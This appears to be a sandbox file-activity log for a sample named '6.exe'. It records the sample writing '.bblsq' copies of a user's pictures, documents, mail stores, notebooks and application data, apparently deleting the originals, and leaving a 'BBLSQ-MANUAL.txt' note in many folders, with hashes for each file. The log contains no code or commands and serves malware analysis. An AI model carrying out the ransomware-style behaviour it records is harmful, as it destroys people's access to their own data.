SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.bblsq
binary
MD5: 54fbb16b8cee63c7051e9a2cc97da6d8
SHA256: 37e87f7715d489fbe5bf0ce99c2e007a1ae7ea78b842a40131d07034d74d596f
2456
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Pictures\startteam.jpg.bblsq
binary
MD5: 8a4ed660f67dc8438dd1e3af13fa7a9b
SHA256: 197046bbfac920352094f359d63c762bce51f046ef8a2beb49e22cac372b9a5e
2456
6.exe
C:\Users\admin\Pictures\writtenunless.png.bblsq
pgc
MD5: ee4c752b4b47857d1562a43830372dc5
SHA256: 8804ca75ca9d68cf53be0511e992798448109d8a4f3e0946bfb4e520f4f54f73
2456
6.exe
C:\Users\admin\Pictures\wanthardcore.png.bblsq
binary
MD5: b369d39d56792343edc147828c5809a5
SHA256: 60c58180ca2f7a7ff38825d281ce66922425caf2fe0565013b411dfe5e5d05c8
2456
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Saved Games\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Searches\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Pictures\startteam.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Pictures\wanthardcore.png
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Pictures\writtenunless.png
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\ntuser.ini.bblsq
binary
MD5: 530732ab4195ed2325e4cf839b737f57
SHA256: 1c925acb806c43f92bf86be540008aaee7801f915f75499da33e2eed87b5a24c
2456
6.exe
C:\Users\admin\Pictures\germananal.png.bblsq
binary
MD5: 6e0221efabc811cb18b720c4e4aeee6f
SHA256: b6a566c954bab56d1a46c0bbe16d072097de0a67bdce59e83cf44b7895a756c0
2456
6.exe
C:\Users\admin\Pictures\builthosting.jpg.bblsq
binary
MD5: 08f542c1fdde105c56fd173d2f0f7c07
SHA256: 01b05b135e76d19bc5004dfa93d67c7dc9cdb177e0cf20f6a60a0effda251526
2456
6.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Pictures\builthosting.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Pictures\germananal.png
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Links\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.bblsq
binary
MD5: 6d67ffe3404bd2c6ec510c1c4336a671
SHA256: 62be9c82c8ab54754a0a601af23a9ada4a24370ead68856f9db6d83e8a2a38e1
2456
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.bblsq
binary
MD5: 50338b552bad909fc6e1e84cb83292f0
SHA256: 3cf75406d1eaa0c311bb4f24c46b60e8df9c2f2042704e74491f43b1be3ba633
2456
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.bblsq
binary
MD5: 70107690ae889f81f5fa0d9b4f0399c0
SHA256: 03d9940ac32447eb1cba98b5884aac72895c4a253eaf75bda74eaf8d8185fe3b
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.bblsq
binary
MD5: 3580491a2ac51aeb0165283eac0dee78
SHA256: dcf3a8177f26b77fe4c033fb9bf24029c6822d98ddcbb5afce4faffe2d52740a
2456
6.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.bblsq
binary
MD5: 1b08987ddeedc3bf4c9dbb2c28923083
SHA256: 8d2257eee35dff5befcc19a5718900ffc0847802db84f878952d360e2272943c
2456
6.exe
C:\Users\admin\Favorites\Windows Live\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.bblsq
binary
MD5: b7a15afca53c81d75da27306c8453d03
SHA256: 99b1d818bc933cab47355b847e0bfb5a6474479325baf25a3b31463928cc2c27
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.bblsq
binary
MD5: af71979bcd148f72927d3299b59e8c58
SHA256: 33b33e7bb5004556a1c4f46cf6c7b02a32a4e1638e4ac44fbf3735e27c318ac1
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.bblsq
binary
MD5: 3da2c0029bdd79e7904a439a021edefc
SHA256: 4b72b9e8bb457dd4b4ea65fd4ddedcdb5d2ae2ed671fa48128a224f198c29cd4
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.bblsq
binary
MD5: 00a03e9d7fb90d39e0ad759e16c7b0f6
SHA256: c47d7a25c4437ba110653726e0850c0567159469f920bc7569c76dee9ce96ab2
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.bblsq
binary
MD5: 24c34c0bba87630c6113cc537fc2ba51
SHA256: 099d66fd86d5799010769c888263ca960b928acae8d11845989325ba628fed70
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.bblsq
binary
MD5: ba958ce1bb632c33836b82a5a9cc27df
SHA256: b4d53e56007c293aeae83218540d6703d6e799374212a8ff10570050eecc94af
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.bblsq
binary
MD5: 800032386ff2ce1798cbd4c2e6f1f6c7
SHA256: 2124d40ba52782061fa8fdbf2bebfa9ec94ab5bb0432bcef788a7a1322d96ff7
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.bblsq
bs
MD5: fa55f2778e8cbe43f83fc2443143bb6b
SHA256: b8ba30ccb15ca48f9e7c1661a0ab34470971812a91f4305f8774e3047bf596c8
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.bblsq
binary
MD5: 39be9584fbbcc672a5aa896f7ffdedfa
SHA256: 1e31c542a5bc927e7f60067f97fdac887950bc20b0f81f1eb0f690dd86e14d86
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.bblsq
binary
MD5: 6bdece46a8614724c8d67e5e601cbd23
SHA256: 223572ca86cc25a4fe162610d4f8ee6ea7f68ae8c9f065f99b40b307e3888891
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.bblsq
binary
MD5: 600a8ead246c12a9bd382be39b85e199
SHA256: 6f8895a487e11da363e808ace005915baa7870b4d479e39b34e2284208b3ffa8
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.bblsq
binary
MD5: 9c107e1a238a0592804d884dfa1d6a20
SHA256: 86b9e60d872f875d60ac68a03c293cef92de05fba8eb517f62b99733777d8c87
2456
6.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.bblsq
binary
MD5: 7580379e8266ce16eb4f5c1f6a5d128d
SHA256: 6eb1c75941cec0b7325c16b63d92de322380ae8fa2683902217d0cb07af3281e
2456
6.exe
C:\Users\admin\Favorites\Links for United States\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.bblsq
binary
MD5: fe7a100153ffb1ec5b8a8c5ac1196480
SHA256: fa8bf579dcae91d527bf76f78c1a56743b50446577097484cd2b0e6d19bbbed2
2456
6.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Downloads\stayknown.jpg.bblsq
binary
MD5: d934f680384a2afd4e5b759f56527b02
SHA256: 5be936be19d52d4e9b98ae06bfd404b36b5a4326d998199e8bcf41f80d7ac9f0
2456
6.exe
C:\Users\admin\Downloads\englishitself.png.bblsq
binary
MD5: 0560e46339cb83a29fa921a5cda60978
SHA256: cc65e0bf2781b8891d809eb39ee5bd8a39662d4a6dbed717723f61df206e818b
2456
6.exe
C:\Users\admin\Downloads\interestingpartner.png.bblsq
binary
MD5: 8c15b625a65f66565a4a783692c3a915
SHA256: 605511d4d11758eaaadfea65906b063e9e1a607e4ab98eccacf049d82c41cbfc
2456
6.exe
C:\Users\admin\Favorites\Links\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Favorites\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Downloads\publicindian.png.bblsq
binary
MD5: 1175857fe6425035f20f8bd306b01789
SHA256: 7913bd7c7304d2172e8cfea1f98b4cc899d142ebdf944f9d834f78315b628406
2456
6.exe
C:\Users\admin\Downloads\publicindian.png
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Downloads\interestingpartner.png
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Downloads\stayknown.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Downloads\englishitself.png
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Downloads\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Documents\similarunique.rtf.bblsq
binary
MD5: 8708c14be061b2c9b133e53e758b0e77
SHA256: 9141aa64a8702da1e803cd8352c6874dbe25c5a46c78c05ac5509594855a7d9c
2456
6.exe
C:\Users\admin\Documents\radiolarger.rtf.bblsq
binary
MD5: b0ea1239bbaf3ed0f7a5eca79ea83c58
SHA256: 85052726cf675ca0167ebe86e5274522a5380a5d5d52f1592f45f7cf2888e81e
2456
6.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.bblsq
binary
MD5: ac7284017c0e96fa330b310906a0eba1
SHA256: 1d9a743cb4bbdb2b08fab7095270fc1b20314d8a368543b5b35cf55cd34e6e01
2456
6.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\similarunique.rtf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\radiolarger.rtf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.bblsq
binary
MD5: 0b658e8a73b78ef9bfee35442c0f097d
SHA256: a00c67f47b52f5aac01525ab2e553c4250eff8514c011d4acfa178403af703b9
2456
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.bblsq
binary
MD5: 792cbb7bc113f8fdf1e3c870e31a00e0
SHA256: afa650403b0ff8415ebbb5722220b618dc4ddfd6eebf1ffd1b384047b9cfea99
2456
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.bblsq
binary
MD5: afea1fcbcb821e1b81deb7042f05f254
SHA256: f1351e1dadfd43d3ce263dbce8e9c5e0b22bfdf056d84138f2d45f106c9d457e
2456
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.bblsq
mp3
MD5: 75469ea533ab7afa3decb65981803850
SHA256: 6c7fb1199818f874844f1f89c94c93d7acfd4939edc054c4621a052f45ed7154
2456
6.exe
C:\Users\admin\Documents\Outlook Files\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: 04f6472101725394a2abceef85832c6f
SHA256: ea3a03009042709cbe4468716306e5da393c80653d2a49319083ef9abde93c8e
2456
6.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.bblsq
binary
MD5: 89c8b71d77082f9c6fed0dd8c81bca3b
SHA256: cc4571904330ed2fae19b7ec0b737e3503b562cf9890fb309e3d75e395e8c986
2456
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.bblsq
binary
MD5: 6d679f6a6229a27ba21ad3cc10ab2586
SHA256: a70d1732d18f5d391fc80ec94b6198dde5f86a1df1306b5b6c70a2b4c4a8d402
2456
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Pictures\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Videos\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Music\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Documents\OneNote Notebooks\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Documents\martinchanged.rtf.bblsq
binary
MD5: 670a551a0bbbbf30c11672ff61f82287
SHA256: 1c1fbdac3fb9659aa890faced61da30946e909020f100d8ddbae2d1c5ce7ce40
2456
6.exe
C:\Users\admin\Documents\martinchanged.rtf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\tvcare.jpg.bblsq
binary
MD5: 443cd6790a5d2626e8629ce87eecdc4e
SHA256: be403e8ff32e010f18745eb53fb1c6630f8ce77900b303953c523abf7b1c0fd3
2456
6.exe
C:\Users\admin\Documents\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Desktop\termfound.png.bblsq
binary
MD5: 75e22c86ee0ff178119bd5a396127bc3
SHA256: 8949281eb4be12de7012c28b8b30521f43abbefa891ef295303f7cc38c6d3d2d
2456
6.exe
C:\Users\admin\Desktop\whitemd.jpg.bblsq
binary
MD5: 15bec9a04d9d261391c6f63e0a97318d
SHA256: 80ccc8bab38f5deedb3a4fe33183bc0066034897ebf72b6746810fadba9ea3e8
2456
6.exe
C:\Users\admin\Desktop\whitemd.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\tvcare.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\internaldomain.jpg.bblsq
binary
MD5: d979fefee66c2a345ace0f2e0ceac28a
SHA256: c7c52aa04d10556fe346e7cc9653d7bf59aa697424f0c3a8c37ad2d58f227258
2456
6.exe
C:\Users\admin\Desktop\saturdayboy.rtf.bblsq
binary
MD5: 6b17361c9c99be331b6dbcaa09170ba9
SHA256: 32ad84eae30cfbaa35f4cae329697c7acae9bc85baef7f0d495520c05769fcac
2456
6.exe
C:\Users\admin\Desktop\mondayhalf.png.bblsq
gpg
MD5: a01c38721fc13c78f928ec25f77f5aeb
SHA256: 2cba5347f3146a5c4cb0fcf1b0d109ef34bead577b58dd6d2909c41955f0116b
2456
6.exe
C:\Users\admin\Desktop\internaldomain.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\termfound.png
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\saturdayboy.rtf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\mondayhalf.png
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\hadprimary.jpg.bblsq
binary
MD5: ac16884f52a7c33843f329c501b86650
SHA256: ebfe95470ba490acd6c1cd2a69c220145f1078c5969351a478be858e8c11ad81
2456
6.exe
C:\Users\admin\Desktop\furnituretechnologies.rtf.bblsq
ini
MD5: bfc6ea2522cbca37708695c614dfbf58
SHA256: 71c68c16f21de2971d62191f4c66e8deb636e34b2ff1d72ef57c6f1f7291792e
2456
6.exe
C:\Users\admin\Desktop\furnituretechnologies.rtf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\hadprimary.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\friamateur.jpg.bblsq
binary
MD5: f21bc62973537c28ca0272a048b31308
SHA256: c8a9506a68623a522baab0f85f7568e66d98c711929dbd79ebdabf856ac5a672
2456
6.exe
C:\Users\admin\Desktop\datediet.rtf.bblsq
binary
MD5: 35fb74c79039f35789146a7dbbedc81a
SHA256: 1b81b8a60d297a83532f13836ae0bfefff2322f373eb3a29c008d5f8ee09ec6f
2456
6.exe
C:\Users\admin\Desktop\datediet.rtf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\friamateur.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Desktop\academicaccounts.rtf.bblsq
binary
MD5: 25efc3faf61c3640794d33434c845e20
SHA256: b7447ffd046967c54d0dcfb8bfc5fc809c329c13ab16a2972c3731749b9af4ed
2456
6.exe
C:\Users\admin\Desktop\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Desktop\academicaccounts.rtf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\Contacts\admin.contact.bblsq
binary
MD5: dc0c70a4a1d27f7cb926146e09d81aca
SHA256: d9d89b2d57d425d3bcd57b8380359f6124e5ccb55496c24d49c6a2c5629c8f37
2456
6.exe
C:\Users\admin\Contacts\admin.contact
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat.bblsq
pgc
MD5: fcf7b3aeedc090e5ba25c509128516d2
SHA256: 28d14dca1e8525dbcd14644e3ed5e2267c0b89ad64194358cc6180a3939474e8
2456
6.exe
C:\Users\admin\Contacts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.bblsq
binary
MD5: f9e57fe60ded4706803802ca5956da75
SHA256: d934a5c595808895ad147605eba53371c82a9ec3153792201d1985eac864634c
2456
6.exe
C:\Users\admin\AppData\Roaming\Sun\Java\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\WinRAR\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Sun\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.bblsq
binary
MD5: 0a0a5a31e4356a5222f5dda146619146
SHA256: 670654928cad2199206e421fcf7bcb4e6595c412c816f4ced005dedabcf7366d
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.bblsq
binary
MD5: 74da00da3e593d4d1a33c3c2662e48d9
SHA256: 2b80453fd5f02de16e854939d1c0dc85914a202ffe06517d8755a6b05896406a
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.bblsq
flc
MD5: 3a70f4029e31da679256945d4ff94ca2
SHA256: 09e6e9002daeb4ff58faef29a52ffa44a1f912cf35b0bba03e16400da26f2129
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.bblsq
binary
MD5: 870bb20341c358993ef4da95fadaec9b
SHA256: bd70f5172e07452f0f37b4e8a748269eb4121213579aba099009c4f1bf456225
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.bblsq
binary
MD5: ad18cf66746ca7e2b76bc7ee062f3ff4
SHA256: 596bbb650cc7c924f54facbcd8341cfe027796730201ae9293598486004637fc
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
